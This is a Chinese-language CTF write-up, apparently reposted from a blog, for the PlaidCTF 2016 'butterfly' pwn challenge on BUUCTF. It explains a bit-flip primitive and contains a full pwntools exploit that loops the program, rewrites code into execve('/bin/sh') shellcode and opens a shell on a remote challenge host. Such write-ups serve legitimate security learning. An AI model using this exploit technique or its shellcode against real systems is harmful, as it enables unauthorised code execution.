[BUUCTF-pwn] butterfly_plaid_2016

看了半天没看明白，第一次看这东西，后来看了下exp原来如果简单

  puts("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?");
  v3 = 1;
  if ( fgets(s, 50, stdin) )
  {
    v4 = strtol(s, 0LL, 0);
    v5 = v4;
    v6 = v4 >> 3;
    v7 = (void *)((v4 >> 3) & 0xFFFFFFFFFFFFF000LL);
    if ( mprotect(v7, 0x1000uLL, 7) )
    {
      perror("mprotect1");
    }
    else
    {
      v3 = 1;
      *(_BYTE *)v6 ^= 1 << (v5 & 7);            // 改变1字节
      if ( mprotect(v7, 0x1000uLL, 5) )
      {
        perror("mprotect2");
      }
      else
      {
        puts("WAS IT WORTH IT???");
        v3 = 0;
      }
    }
  }
  return v3;

每次输入一个数，前一半（不含后3位）表示位置，后3位表示改变这个位置byte的哪一位。把段改为可写然后变然后改回来

原来不知道要干啥，后来看了别人写的，才知道这个是直接改代码

先把call mprotect这个偏移改小，改为跳到start里的一个位置实现循环

然后把这后边的代码改为shellcode（每次改1位）再在后边一个位置的串改为/bin/sh\0

最后再把刚才改的call mprotect这改回来，就走到shellcode了

原exp PlaidCTF - butterfly

这里仅加了注释

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 26427) 

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

'''
0x400860  add rsp,48h; pop rbx;   # 48 83 c4 48 5b
   *(0x400860) ^= 1<<5  0x400860:48->68
0x400860  push 0x5b48c483;        # 68 83 c4 48 5b  
'''

#1, loop 0x400837 call _mprotect(0x400660) -> call 0x4006a0 (_start)
# E8 24 FE FF FF 
# E8 64 FE FF FF   0x400838 6
loop_val = '0x20041c6'
# Start the loop 先修改0x400837处call将地址改中转到为4006a0实现循环
p.sendline(loop_val)

# Generate the payload 修改从0x40084a处开始的代码为shellcode
start_addr = 0x40084a
shell_addr = 0x400914
shellcode = '4831f648c7c03b0000004831d248c7c7140940000f05'
text      = '4531f664488b042528000000483b44244075264489f0'
shell = ''.join('{:02x}'.format(ord(c)) for c in list('/bin/sh\0'))
greeting = 'THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?'[0:8]
greeting = ''.join('{:02x}'.format(ord(c)) for c in greeting)

# We need to parse it bytes after bytes
chunks_sc = [shellcode[i:i+2] for i in range(0, len(shellcode), 2)]
chunks_tx = [text[i:i+2] for i in range(0, len(text), 2)]

# loop over each byte
for i in range(0,len(chunks_tx)):
    # compute the flips needed
    flips = list('{:08b}'.format(int(chunks_tx[i],16) ^ int(chunks_sc[i], 16)))
    flips.reverse()
    indices = []
    # store the offsets of the flips in a table
    for j in range(0,len(flips)):
        if (flips[j] == '1'):
            indices.append(j)
    # for each flip send a corresponding number
    for n in indices:
        p.sendline('0x{:x}'.format((start_addr + i) * 8 + n))

#Same for the greeting and shell
chunks_sh = [shell[i:i+2] for i in range(0, len(shell), 2)]
chunks_gr = [greeting[i:i+2] for i in range(0, len(greeting), 2)]

for i in range(0,len(chunks_gr)):
    flips = list('{:08b}'.format(int(chunks_gr[i],16) ^ int(chunks_sh[i], 16)))
    flips.reverse()
    indices = []
    for j in range(0,len(flips)):
        if (flips[j] == '1'):
            indices.append(j)
    for n in indices:
        p.sendline('0x{:x}'.format((shell_addr + i) * 8 + n))

# Reset the call to mprotect
p.sendline(loop_val)
p.clean()
p.interactive()

标签：butterfly,BUUCTF,format,flips,len,greeting,chunks,range,pwn
来源： https://blog.csdn.net/weixin_52640415/article/details/122369243